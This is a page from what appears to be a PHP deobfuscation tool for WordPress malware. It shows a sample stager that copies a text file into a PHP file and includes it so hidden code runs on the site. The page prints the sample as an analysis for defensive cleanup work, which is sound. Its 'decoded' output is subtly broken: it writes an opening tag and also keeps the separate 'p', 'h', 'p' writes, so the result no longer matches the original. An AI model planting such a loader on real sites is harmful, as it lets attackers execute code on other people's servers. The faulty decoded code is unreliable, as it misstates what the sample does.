PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $desc = 'v.txt'; if(!file_exists($desc) || filesize($desc) == 0){ $sH = fopen("1.txt", 'r+'); $dH = fopen($desc, 'w+'); if ($sH === false || $dH === false) { if ($sH !== false) { fclose($sH); } die('err 1'); } fwrite($dH, '<?'); fwrite($dH, 'p'); fwrite($dH, 'h'); fwrite($dH, 'p '); $bC ...

Obfuscated php code

<?php

$desc = 'v.txt';
if(!file_exists($desc) || filesize($desc) == 0){
	$sH = fopen("1.txt", 'r+');
	$dH = fopen($desc, 'w+');
	if ($sH === false || $dH === false) {
		if ($sH !== false) {
			fclose($sH);
		}
		die('err 1');
	}
	fwrite($dH, '<?');
	fwrite($dH, 'p');
	fwrite($dH, 'h');
	fwrite($dH, 'p ');
	$bC = stream_copy_to_stream($sH, $dH);
	if ($bC === false) {
		die('err 2');
	}
	fclose($sH);
	fclose($dH);
}

include $desc;

Decoded(de-Obfuscated) php code

<?php

$desc = 'v.txt';
if (!file_exists($desc) || filesize($desc) == 0) {
    $sH = fopen("1.txt", 'r+');
    $dH = fopen($desc, 'w+');
    if ($sH === false || $dH === false) {
        if ($sH !== false) {
            fclose($sH);
        }
        die('err 1');
    }
    fwrite($dH, '<?php ');
    fwrite($dH, 'p');
    fwrite($dH, 'h');
    fwrite($dH, 'p ');
    $bC = stream_copy_to_stream($sH, $dH);
    if ($bC === false) {
        die('err 2');
    }
    fclose($sH);
    fclose($dH);
}
include $desc;

Malware detection & removal plugin for WordPress